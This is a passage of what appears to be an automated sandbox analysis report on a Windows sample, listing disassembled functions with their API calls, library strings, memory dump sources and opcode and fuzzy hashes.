                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 525495869-0
                                                                                                                                                                                                                                              • Opcode ID: 20b7312c9b561a6da7319b7e7264bd4ae5a852f696a387eb02d516d82219dad3
                                                                                                                                                                                                                                              • Instruction ID: efcd104709d3e655f4f90ec3b0e60b7c8b69d461aa9dcf482842e1ff0279a5d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20b7312c9b561a6da7319b7e7264bd4ae5a852f696a387eb02d516d82219dad3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B531BFB160020AAFEF008F64DC84EAF7FA8EB48358F118035F914D7651EB35DD248B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEF6A08
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF6A15
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF6A41
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 757764206-0
                                                                                                                                                                                                                                              • Opcode ID: 8788beabe6128f54233339a7360022a3b30930f5cd09a80b655fc9f138ead08b
                                                                                                                                                                                                                                              • Instruction ID: a6ee256bae29c369319570bccd9554ece0860c422d688cb32caeb70a8abb43a6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8788beabe6128f54233339a7360022a3b30930f5cd09a80b655fc9f138ead08b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5312C71E416189FCB10DB69CC80B9EB7B9AF85308F74468AE429EB741C775E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF87EE Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEF6A08
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF6A15
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF6A41
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 757764206-0
                                                                                                                                                                                                                                              • Opcode ID: 8c9ee5980537b02c06423cc97975d63a20286103d432d2dbbe0984e351e76c61
                                                                                                                                                                                                                                              • Instruction ID: 719a174af078c08e06be903348f57603d5e9697b7542bee3a57360cb6007dd41
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c9ee5980537b02c06423cc97975d63a20286103d432d2dbbe0984e351e76c61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76314B70E416189FCB10DB69CC80B9EB7BAAF95208F70468AE429EB741C775E9818F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEFD3E Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEF6A08
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF6A15
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF6A41
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 757764206-0
                                                                                                                                                                                                                                              • Opcode ID: 8c9ee5980537b02c06423cc97975d63a20286103d432d2dbbe0984e351e76c61
                                                                                                                                                                                                                                              • Instruction ID: 482cbb0ab5fce560e334281d6080bfbd1b1409eac5dd181a9563ff2de3f6a698
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c9ee5980537b02c06423cc97975d63a20286103d432d2dbbe0984e351e76c61
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B314BB0E016589BCB10DBA9CC84B9DB7BAAF95308F70458AE458E7741CBB59D818F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEFF89 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEF6A08
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF6A15
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF6A41
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Destroy$Bound$Element
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 757764206-0
                                                                                                                                                                                                                                              • Opcode ID: 8788beabe6128f54233339a7360022a3b30930f5cd09a80b655fc9f138ead08b
                                                                                                                                                                                                                                              • Instruction ID: e2bdfd353060a2653085c2c8e6097f325389bb86591ca47f2418f131d3465b09
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8788beabe6128f54233339a7360022a3b30930f5cd09a80b655fc9f138ead08b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41314CB0E016589FCB14CBA9CC84B9DB7BAAF99304F30468AE418E7741C7B59D818F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF306A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4760: __CxxThrowException@8.LIBCMT ref: 6CED47F9
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF30907
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF30936
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF30959
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF30A25
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • PSSR_MEM: message recovery disabled, xrefs: 6CF309E3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove$Exception@8Throw
                                                                                                                                                                                                                                              • String ID: PSSR_MEM: message recovery disabled
                                                                                                                                                                                                                                              • API String ID: 2655171816-3051149714
                                                                                                                                                                                                                                              • Opcode ID: 13f208bd3b7f7c4ea568efbe05fc3d17595b126095a855185a16f6ac8b4c1a5b
                                                                                                                                                                                                                                              • Instruction ID: ef44633ae428720919a799ca6e5f4f2040c05d03b2a9d825b98aede1c23a533c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13f208bd3b7f7c4ea568efbe05fc3d17595b126095a855185a16f6ac8b4c1a5b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3C168756093819FD714CF28C880B6BBBE5BFC9304F148A5DE58987785DB70E909CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF37FE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF380EA
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: Max$Min$RandomNumberType$invalid bit length
                                                                                                                                                                                                                                              • API String ID: 3718517217-2498579642
                                                                                                                                                                                                                                              • Opcode ID: 5b5fe63c47fdcab016efb3502232eb1c324d6ac928b69b0d6a6fa1829df578a3
                                                                                                                                                                                                                                              • Instruction ID: 9824aac7d05b69d4149e74d01bb672ed7d842ca9b145ee01c9bd6f1c5eefb5e1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b5fe63c47fdcab016efb3502232eb1c324d6ac928b69b0d6a6fa1829df578a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6C19E716097809BE324CB68C850BCFB7E5BFD9304F444A1EE59983B91EB749908C7A3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF3BE8E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CreateFrameInfo.LIBCMT ref: 6CF3BEB6
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AB70: __getptd.LIBCMT ref: 6CF3AB7E
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AB70: __getptd.LIBCMT ref: 6CF3AB8C
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3BEC0
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __getptd_noexit.LIBCMT ref: 6CF3EAE9
                                                                                                                                                                                                                                                • Part of subcall function 6CF3EAE6: __amsg_exit.LIBCMT ref: 6CF3EAF6
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3BECE
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3BEDC
                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6CF3BEE7
                                                                                                                                                                                                                                              • _CallCatchBlock2.LIBCMT ref: 6CF3BF0D
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC15: __CallSettingFrame@12.LIBCMT ref: 6CF3AC61
                                                                                                                                                                                                                                                • Part of subcall function 6CF3BFB4: __getptd.LIBCMT ref: 6CF3BFC3
                                                                                                                                                                                                                                                • Part of subcall function 6CF3BFB4: __getptd.LIBCMT ref: 6CF3BFD1
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1602911419-0
                                                                                                                                                                                                                                              • Opcode ID: d93682fd6126b0fa06b0b58cc7a6d4f4e7267b14a7fa4d14197d7ed3c102ccc4
                                                                                                                                                                                                                                              • Instruction ID: 411f524109aa807d632d382fd9a72de69e9a2a171716f492e228dcab738644e9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d93682fd6126b0fa06b0b58cc7a6d4f4e7267b14a7fa4d14197d7ed3c102ccc4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E11C6B1C00219EFDF14DFA4C944ADEBBB0FF44318F109469E858A7750EB399A599F90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 05B00F14 Relevance: 9.0, Strings: 7, Instructions: 201COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1709698902.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b00000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: HERE$HERE$LOOK$LOOK$p<^q$p<^q$Gvq
                                                                                                                                                                                                                                              • API String ID: 0-792669839
                                                                                                                                                                                                                                              • Opcode ID: 0b09c8c4a469e5de4ddf2c2fd33e123107bedbbfc2ff108e9ce33d8872d5caef
                                                                                                                                                                                                                                              • Instruction ID: c4811d0442c14e041fecb7e5a2a6d25f53f214d6d458b9f034b1d4d8fc82d568
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b09c8c4a469e5de4ddf2c2fd33e123107bedbbfc2ff108e9ce33d8872d5caef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70A17374E402298FDB68DF69C984BD9BBB1BB48310F1491E9D54DAB360DB30AE85CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF070E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 187COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF07267
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
